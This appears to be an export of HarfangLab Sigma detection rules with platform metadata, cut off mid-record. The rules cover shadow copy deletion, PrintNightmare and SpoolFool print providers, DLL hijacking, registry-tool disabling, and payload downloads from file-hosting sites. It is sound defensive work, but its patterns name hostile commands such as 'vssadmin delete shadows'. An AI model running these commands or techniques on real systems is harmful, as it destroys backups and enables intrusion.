"https://www.cisa.gov/news-events/cybersecurity-advisories/aa24-241a",
"https://attack.mitre.org/techniques/T1105/",
"https://attack.mitre.org/techniques/T1071/001/"
],
"name": "t1105_suspicious_dns_request_filehosting.yml",
"content": "title: DNS Request to Suspicious File Hosting Website (Windows)\nid: 71223ef6-7b62-4e8e-8457-634d94aea022\ndescription: |\n Detects a DNS request to a public file hosting service that may contain a malicious payload.\n This technique has been used by ransomware operators to download payloads that are hosted on public websites.\n It is recommended to perform an analysis of the downloaded file to check if the content is malicious.\nreferences:\n - https://thedfirreport.com/2024/06/10/icedid-brings-screenconnect-and-csharp-streamer-to-alphv-ransomware-deployment/\n - https://twitter.com/embee_research/status/1623908375242350593\n - https://www.cisa.gov/news-events/cybersecurity-advisories/aa24-241a\n - https://attack.mitre.org/techniques/T1105/\n - https://attack.mitre.org/techniques/T1071/001/\ndate: 2023/11/20\nmodified: 2025/12/19\nauthor: HarfangLab\ntags:\n - attack.command_and_control\n - attack.t1105\n - attack.t1071.001\n - classification.Windows.Source.DnsQuery\n - classification.Windows.Behavior.CommandAndControl\n - classification.Windows.Behavior.FileDownload\nlogsource:\n category: dns_query\n product: windows\ndetection:\n selection:\n QueryName:\n - '*transfer.sh'\n - '*gofile.io'\n - '*file.io'\n - '*send.exploit.in'\n - '*catbox.moe'\n - 'temp.sh'\n\n filter_browser:\n ProcessOriginalFileName:\n - 'firefox.exe'\n - 'chrome.exe'\n - 'brave.exe'\n - 'msedge.exe'\n - 'librewolf.exe'\n - 'opera.exe'\n - 'vivaldi.exe'\n - 'iexplore.exe'\n - 'msedgewebview2.exe'\n - 'zen.exe'\n\n exclusion_legitimate:\n QueryName: 'featureflags.sharefile.io'\n\n exclusion_programfiles:\n ProcessImage|startswith:\n - '?:\\Program Files\\'\n - '?:\\Program Files (x86)\\'\n ProcessSigned: 'true'\n\n exclusion_misc_windows:\n ProcessImage:\n - '?:\\Windows\\System32\\PING.EXE'\n - '?:\\Windows\\SysWOW64\\PING.EXE'\n - '?:\\Windows\\System32\\ipconfig.exe'\n - '?:\\Windows\\SysWOW64\\ipconfig.exe'\n - '?:\\Windows\\System32\\wbem\\WmiPrvSE.exe'\n - '?:\\Windows\\System32\\wbem\\WmiApSrv.exe'\n - '?:\\Windows\\System32\\smartscreen.exe'\n\n exclusion_svchost:\n ProcessImage: '?:\\Windows\\System32\\svchost.exe'\n ProcessParentImage: '?:\\Windows\\System32\\services.exe'\n\n exclusion_defender:\n ProcessImage:\n - '?:\\ProgramData\\Microsoft\\Windows Defender\\Platform\\\\*\\MsMpEng.exe'\n - '?:\\ProgramData\\Microsoft\\Windows Defender\\Platform\\\\*\\nissrv.exe'\n ProcessSigned: 'true'\n ProcessSignature:\n - 'Microsoft Corporation'\n - 'Microsoft Windows Publisher'\n - 'Microsoft Windows'\n\n exclusion_mcafee:\n ProcessImage: '?:\\Program Files\\McAfee\\Endpoint Security\\Adaptive Threat Protection\\mfeatp.exe'\n\n exclusion_xmind:\n ProcessImage:\n - '?:\\Program Files\\XMind\\XMind.exe'\n - '?:\\Program Files (x86)\\XMind\\XMind.exe'\n\n exclusion_rave:\n ProcessImage: '?:\\Users\\\\*\\AppData\\Local\\Programs\\rave-desktop\\rave.exe'\n\n exclusion_opera:\n ProcessImage|endswith: '\\opera.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'Opera Norway AS'\n\n exclusion_cisco:\n ProcessImage: '?:\\Users\\\\*\\AppData\\Local\\CiscoSparkLauncher\\CiscoCollabHost.exe'\n\n condition: selection and not 1 of filter_* and not 1 of exclusion_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "71223ef6-7b62-4e8e-8457-634d94aea022",
"rule_name": "DNS Request to Suspicious File Hosting Website (Windows)",
"rule_description": "Detects a DNS request to a public file hosting service that may contain a malicious payload.\nThis technique has been used by ransomware operators to download payloads that are hosted on public websites.\nIt is recommended to perform an analysis of the downloaded file to check if the content is malicious.\n",
"rule_creation_date": "2023-11-20",
"rule_modified_date": "2025-12-19",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.command_and_control"
],
"rule_technique_tags": [
"attack.t1071.001",
"attack.t1105"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "712a3c26-8c9a-4390-938e-dd0dd4e5595c",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "critical",
"rule_effective_confidence": "moderate",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.071720Z",
"creation_date": "2026-03-23T11:45:34.071722Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.071726Z",
"rule_level": "critical",
"rule_confidence": "moderate",
"rule_confidence_override": null,
"references": [
"https://attack.mitre.org/techniques/T1490/"
],
"name": "t1490_shadow_copy_deleted.yml",
"content": "title: Volume Shadow Copies Deleted\nid: 712a3c26-8c9a-4390-938e-dd0dd4e5595c\ndescription: |\n Detects when a Volume Shadow Copies (VSS) is deleted (or resized to a very low value) using various systems utilities such as vssadmin and wmic.\n Numerous threat actors and ransomwares perform this operation prior to deleting/encrypting data.\n It is recommended to check if this operation is expected and to analyze the process' parent for other suspicious activities.\nreferences:\n - https://attack.mitre.org/techniques/T1490/\ndate: 2020/09/28\nmodified: 2025/04/15\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1490\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Behavior.VolumeShadowCopy\n - classification.Windows.Behavior.Deletion\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection:\n - Image|endswith:\n - '\\wmic.exe'\n - '\\vssadmin.exe'\n # renamed binaries\n - OriginalFileName:\n - 'wmic.exe'\n - 'VSSADMIN.EXE'\n\n selection_delete:\n CommandLine|contains|all:\n # we want to match :\n # - vssadmin delete shadows (/all /quiet)\n # - wmic shdowcopy delete\n # matching shadow ==> matches on shadows and shadowcopy\n - delete\n - shadow\n selection_resize_shadowstorage:\n CommandLine|contains|all:\n # handles vssadmin resize shadowstorage /for=xx /maxsize=yy with yy == low value (which deletes whadow copies..)\n # see https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/vssadmin-resize-shadowstorage\n - 'resize'\n - 'shadowstorage'\n - '/maxsize'\n selection_delete_shadowstorage:\n CommandLine|contains|all:\n - 'delete'\n - 'shadowstorage'\n\n exclusion_litetouch:\n # vssadmin resize shadowstorage /For=C: /On=C: /MaxSize=5%\n CommandLine: 'vssadmin resize shadowstorage /For=C: /On=C: /MaxSize=5%'\n # C:\\Windows\\System32\\wscript.exe C:\\MININT\\Scripts\\LTICleanup.wsf\n # C:\\Windows\\System32\\wscript.exe \\\\1[redacted]\\e$\\DeploymentShare\\Scripts\\LTICleanup.wsf\n # cscript.exe \\\\[redacted]\\DeploymentShare$\\Scripts\\LTICleanup.wsf\n GrandparentImage:\n - '?:\\Windows\\System32\\wscript.exe'\n - '?:\\Windows\\System32\\cscript.exe'\n GrandparentCommandLine|contains: '\\Scripts\\LTICleanup.wsf'\n\n exclusion_iperius:\n CommandLine:\n - 'vssadmin delete shadows /For=C: /Oldest /Quiet'\n - 'vssadmin delete shadows /shadow={????????-????-????-????-????????????} /quiet'\n GrandparentImage:\n - '?:\\Program Files (x86)\\Iperius Backup\\Iperius.exe'\n - '?:\\Program Files (x86)\\Sauvegarde System\\Iperius.exe'\n\n exclusion_big_size:\n # C:\\WINDOWS\\system32\\vssadmin.exe resize shadowstorage /on=c: /for=c: /maxsize=10240MB\n CommandLine:\n - '* resize */maxsize=1????MB*'\n - '* resize */maxsize=2????MB*'\n - '* resize */maxsize=3????MB*'\n - '* resize */maxsize=4????MB*'\n - '* resize */maxsize=5????MB*'\n - '* resize */Maxsize=1?GB*'\n - '* resize */Maxsize=2?GB*'\n - '* resize */Maxsize=3?GB*'\n - '* resize */Maxsize=4?GB*'\n - '* resize */Maxsize=5?GB*'\n - '* resize */MaxSize=1?%'\n - '* resize */MaxSize=2?%'\n - '* resize */MaxSize=3?%'\n - '* resize */MaxSize=4?%'\n - '* resize */MaxSize=5?%'\n\n exclusion_dell:\n ProcessParentOriginalFileName: 'VssShadowFix.exe'\n ProcessParentSignature: 'Dell Inc'\n CommandLine: '?:\\WINDOWS\\system32\\vssadmin.exe resize shadowstorage /for=?: /on=?: /maxsize=2%'\n\n exclusion_easyus:\n ParentImage: '?:\\Program Files\\EaseUS\\EaseUS Partition Master\\bin\\EPMUI.exe'\n\n exclusion_kiwibackup:\n ParentImage: '?:\\Program Files\\Kiwi-Backup\\Kiwi-Backup\\kiwi.exe'\n ProcessParentSigned: 'true'\n ProcessParentSignature: 'KIWI BACKUP'\n\n condition: selection and 1 of selection_* and not 1 of exclusion_*\nlevel: critical\n# level: high\nconfidence: moderate\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "712a3c26-8c9a-4390-938e-dd0dd4e5595c",
"rule_name": "Volume Shadow Copies Deleted",
"rule_description": "Detects when a Volume Shadow Copies (VSS) is deleted (or resized to a very low value) using various systems utilities such as vssadmin and wmic.\nNumerous threat actors and ransomwares perform this operation prior to deleting/encrypting data.\nIt is recommended to check if this operation is expected and to analyze the process' parent for other suspicious activities.\n",
"rule_creation_date": "2020-09-28",
"rule_modified_date": "2025-04-15",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion"
],
"rule_technique_tags": [
"attack.t1490"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "7135edeb-86d3-4d04-a2e4-8eb48e25987c",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "critical",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.608498Z",
"creation_date": "2026-03-23T11:45:34.608501Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.608508Z",
"rule_level": "critical",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-1675",
"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-21999",
"https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-1675",
"https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-21999",
"https://www.cynet.com/attack-techniques-hands-on/quakbot-strikes-with-quaknightmare-exploitation/",
"https://research.ifcr.dk/spoolfool-windows-print-spooler-privilege-escalation-cve-2022-22718-bf7752b68d81"
],
"name": "t1574_spoolsv_new_malicious_provider.yml",
"content": "title: Malicious Print Provider Added\nid: 7135edeb-86d3-4d04-a2e4-8eb48e25987c\ndescription: |\n Detects the installation of a malicious print provider via a registry value.\n This can be the result of an exploitation of CVE-2021-1675 (aka PrintNightmare) or CVE-2022-21999 (aka SpoolFool) to gain code execution in spoolsv.\n This is a remote or local code execution vulnerability that exists in the Windows Print Spooler service.\n An attacker who successfully exploited this vulnerability could run arbitrary code with SYSTEM privileges.\n It is recommended to investigate the timeline for malicious activity and to look for any suspicious processes or alerts running as SYSTEM.\nreferences:\n - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-1675\n - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-21999\n - https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-1675\n - https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-21999\n - https://www.cynet.com/attack-techniques-hands-on/quakbot-strikes-with-quaknightmare-exploitation/\n - https://research.ifcr.dk/spoolfool-windows-print-spooler-privilege-escalation-cve-2022-22718-bf7752b68d81\ndate: 2021/11/12\nmodified: 2025/04/08\nauthor: HarfangLab\ntags:\n - attack.execution\n - attack.t1574\n - attack.s0002\n - cve.2021-1675\n - cve.2022-21999\n - classification.Windows.Source.Registry\n - classification.Windows.Exploit.CVE-2022-21999\n - classification.Windows.Exploit.CVE-2021-1675\n - classification.Windows.Exploit.SpoolFool\n - classification.Windows.Exploit.PrintNightmare\n - classification.Windows.Behavior.Lateralization\n - classification.Windows.Behavior.PrivilegeEscalation\nlogsource:\n product: windows\n category: registry_event\ndetection:\n selection_base:\n EventType: SetValue\n Image|endswith: '\\spoolsv.exe'\n selection_variant_cve_2021_1675:\n TargetObject:\n - 'HKLM\\System\\CurrentControlSet\\Control\\Print\\Environments\\Windows *\\Drivers\\Version-?\\1234\\Configuration File'\n - 'HKLM\\System\\CurrentControlSet\\Control\\Print\\Environments\\Windows *\\Drivers\\Version-?\\12345\\Configuration File'\n # Quakbot (spider.dll)\n - 'HKLM\\System\\CurrentControlSet\\Control\\Print\\Environments\\Windows *\\Drivers\\Version-?\\123456\\Configuration File'\n # Mimikatz\n - 'HKLM\\System\\CurrentControlSet\\Control\\Print\\Environments\\Windows *\\Drivers\\Version-?\\mimikatz*\\Configuration File'\n - 'HKLM\\System\\CurrentControlSet\\Control\\Print\\Environments\\Windows *\\Drivers\\Version-?\\\\*-legitprinter\\Configuration File'\n - 'HKLM\\System\\CurrentControlSet\\Control\\Print\\Environments\\Windows *\\Drivers\\Version-?\\\\*-reallylegitprinter\\Configuration File'\n selection_variant_cve_2022_21999:\n TargetObject: 'HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Print\\Printers\\\\*\\CopyFiles\\Module'\n Details:\n # Used by SpoolFool to forcefully restart spoolsv.dll\n - '?:\\Windows\\System32\\AppVTerminator.dll'\n # Used by SpoolFool for its PoC\n - '*\\AddUser.dll'\n condition: selection_base and 1 of selection_variant_*\nlevel: critical\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "7135edeb-86d3-4d04-a2e4-8eb48e25987c",
"rule_name": "Malicious Print Provider Added",
"rule_description": "Detects the installation of a malicious print provider via a registry value.\nThis can be the result of an exploitation of CVE-2021-1675 (aka PrintNightmare) or CVE-2022-21999 (aka SpoolFool) to gain code execution in spoolsv.\nThis is a remote or local code execution vulnerability that exists in the Windows Print Spooler service.\nAn attacker who successfully exploited this vulnerability could run arbitrary code with SYSTEM privileges.\nIt is recommended to investigate the timeline for malicious activity and to look for any suspicious processes or alerts running as SYSTEM.\n",
"rule_creation_date": "2021-11-12",
"rule_modified_date": "2025-04-08",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.execution"
],
"rule_technique_tags": [
"attack.t1574"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "7145827a-ffd8-421e-8a61-140558680892",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "medium",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.623054Z",
"creation_date": "2026-03-23T11:45:34.623056Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.623061Z",
"rule_level": "medium",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://twitter.com/1ZRR4H/status/1575364104822444032",
"https://attack.mitre.org/techniques/T1562/001/"
],
"name": "t1562_001_disable_registry_tools.yml",
"content": "title: Registry Tools Disabled\nid: 7145827a-ffd8-421e-8a61-140558680892\ndescription: |\n Detects the disabling of the use of Registry Tools for a said user.\n Attackers can use this registry modification to prevent users from starting registry tools and from doing remediative actions.\n It is recommended to investigate the process that did this registry modification and the context of this action to determine its legitimacy.\nreferences:\n - https://twitter.com/1ZRR4H/status/1575364104822444032\n - https://attack.mitre.org/techniques/T1562/001/\ndate: 2022/11/03\nmodified: 2026/03/16\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1562.001\n - classification.Windows.Source.Registry\n - classification.Windows.Behavior.ConfigChange\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: registry_event\ndetection:\n selection:\n EventType: SetValue\n TargetObject: 'HKU\\\\*\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\System\\DisableRegistryTools'\n Details|contains: 'DWORD' # Any non-zero value works, not just DWORD (0x00000001)\n\n filter_zero:\n Details: 'DWORD (0x00000000)'\n\n exclusion_programfiles:\n ProcessImage|startswith:\n - '?:\\Program Files\\'\n - '?:\\Program Files (x86)\\'\n\n exclusion_template_gpo:\n ProcessImage|endswith: '\\svchost.exe'\n ProcessCommandLine:\n - '?:\\Windows\\system32\\svchost.exe -k GPSvcGroup'\n - '?:\\WINDOWS\\system32\\svchost.exe -k GPSvcGroup -s gpsvc'\n - '?:\\Windows\\system32\\svchost.exe -k netsvcs -s gpsvc'\n - '?:\\Windows\\system32\\svchost.exe -k netsvcs -p -s gpsvc'\n - '?:\\Windows\\System32\\svchost.exe -k netsvcs' # (Windows Server 2012 and 2016)\n - '?:\\WINDOWS\\system32\\svchost.exe -k netsvcs -p'\n - '?:\\WINDOWS\\system32\\svchost.exe -k UserProfileService -p -s gpsvc'\n ProcessUserSID: 'S-1-5-18'\n ProcessParentImage: '?:\\Windows\\System32\\services.exe'\n\n exclusion_ccmexec:\n ProcessOriginalFileName: 'CcmExec.exe'\n ProcessUserSID: 'S-1-5-18'\n ProcessParentImage: '?:\\Windows\\System32\\services.exe'\n\n exclusion_deviceenroller:\n ProcessImage: '?:\\Windows\\System32\\DeviceEnroller.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'Microsoft Windows'\n\n exclusion_userlock:\n ProcessOriginalFileName: 'UlAgent.dll'\n ProcessSignature: 'IS Decisions SA'\n\n exclusion_setuphost:\n ProcessImage: '?:\\$WINDOWS.~BT\\Sources\\SetupHost.exe'\n\n exclusion_intune:\n ProcessImage: '?:\\Windows\\System32\\omadmclient.exe'\n\n exclusion_mmc:\n ProcessCommandLine|startswith: '?:\\WINDOWS\\system32\\mmc.exe ?:\\Windows\\System32\\gpme.msc /s /gpobject:LDAP://'\n\n # https://www.aesis-conseil.com/\n exclusion_webkiosk:\n ProcessImage: '?:\\Program Files\\WkLock\\WkLockService.exe'\n\n exclusion_gpo_reporting:\n ProcessCommandLine: '?:\\WINDOWS\\system32\\DllHost.exe /Processid:{7F9BBC82-BA5F-4448-8622-EF76B8D007E6}'\n ProcessParentImage: '?:\\Windows\\System32\\svchost.exe'\n\n exclusion_iaca:\n ProcessImage: '?:\\Windows\\SysWOW64\\SvCliaca.exe'\n ProcessCompany: 'IACASOFT'\n\n exclusion_azure:\n ProcessImage: '?:\\Windows\\System32\\dsregcmd.exe'\n\n condition: selection and not 1 of filter_* and not 1 of exclusion_*\nlevel: medium\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "7145827a-ffd8-421e-8a61-140558680892",
"rule_name": "Registry Tools Disabled",
"rule_description": "Detects the disabling of the use of Registry Tools for a said user.\nAttackers can use this registry modification to prevent users from starting registry tools and from doing remediative actions.\nIt is recommended to investigate the process that did this registry modification and the context of this action to determine its legitimacy.\n",
"rule_creation_date": "2022-11-03",
"rule_modified_date": "2026-03-16",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion"
],
"rule_technique_tags": [
"attack.t1562.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "71584c03-fa25-4f66-8f19-7d7be98df2de",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.075554Z",
"creation_date": "2026-03-23T11:45:34.075556Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.075561Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://github.com/xforcered/WFH",
"https://securityintelligence.com/posts/windows-features-dll-sideloading/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_convert.yml",
"content": "title: DLL Hijacking via CONVERT.exe\nid: 71584c03-fa25-4f66-8f19-7d7be98df2de\ndescription: |\n Detects potential Windows DLL Hijacking via CONVERT.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://github.com/xforcered/WFH\n - https://securityintelligence.com/posts/windows-features-dll-sideloading/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2022/09/15\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'CONVERT.EXE'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\ifsutil.dll'\n - '\\osuninst.dll'\n - '\\scecli.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "71584c03-fa25-4f66-8f19-7d7be98df2de",
"rule_name": "DLL Hijacking via CONVERT.exe",
"rule_description": "Detects potential Windows DLL Hijacking via CONVERT.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2022-09-15",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "716e51d3-33b4-4ccb-88a4-aa86d0153c2a",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "low",
"rule_effective_confidence": "moderate",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.621670Z",
"creation_date": "2026-03-23T11:45:34.621672Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.621676Z",
"rule_level": "low",
"rule_confidence": "moderate",
"rule_confidence_override": null,
"references": [
"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1049/T1049.md#atomic-test-1---system-network-connections-discovery",
"https://attack.mitre.org/techniques/T1049/",
"https://attack.mitre.org/software/S0104/"
],
"name": "t1049_system_network_connections_discovered_linux.yml",
"content": "title: System Network Connections Discovered\nid: 716e51d3-33b4-4ccb-88a4-aa86d0153c2a\ndescription: |\n Detects the execution of commands to retrieve information about network connections.\n Attackers may use it during the discovery phase to display information about the system.\n It is recommended to investigate the process performing this action to determine its legitimacy.\nreferences:\n - https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1049/T1049.md#atomic-test-1---system-network-connections-discovery\n - https://attack.mitre.org/techniques/T1049/\n - https://attack.mitre.org/software/S0104/\ndate: 2025/10/21\nmodified: 2026/01/21\nauthor: HarfangLab\ntags:\n - attack.discovery\n - attack.t1049\n - attack.s0039\n - attack.s0104\n - classification.Linux.Source.ProcessCreation\n - classification.Linux.Behavior.Discovery\nlogsource:\n category: process_creation\n product: linux\ndetection:\n selection:\n # For new agents, we use the correlation rule (e595008e-d87c-4a1b-a72c-3f9c72d68aca).\n AgentVersion|lt|version: 5.4.0\n CommandLine: 'sh -c netstat; who -a'\n\n condition: selection\nlevel: low\nconfidence: moderate\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "716e51d3-33b4-4ccb-88a4-aa86d0153c2a",
"rule_name": "System Network Connections Discovered",
"rule_description": "Detects the execution of commands to retrieve information about network connections.\nAttackers may use it during the discovery phase to display information about the system.\nIt is recommended to investigate the process performing this action to determine its legitimacy.\n",
"rule_creation_date": "2025-10-21",
"rule_modified_date": "2026-01-21",
"rule_os": "linux",
"rule_status": null,
"rule_tactic_tags": [
"attack.discovery"
],
"rule_technique_tags": [
"attack.t1049"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "716e6c14-f88a-4b70-a62b-aa332b631bab",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.074729Z",
"creation_date": "2026-03-23T11:45:34.074731Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.074735Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://attack.mitre.org/techniques/T1003/002/",
"https://attack.mitre.org/techniques/T1059/001/"
],
"name": "t1003_002_powershell_sam_vss.yml",
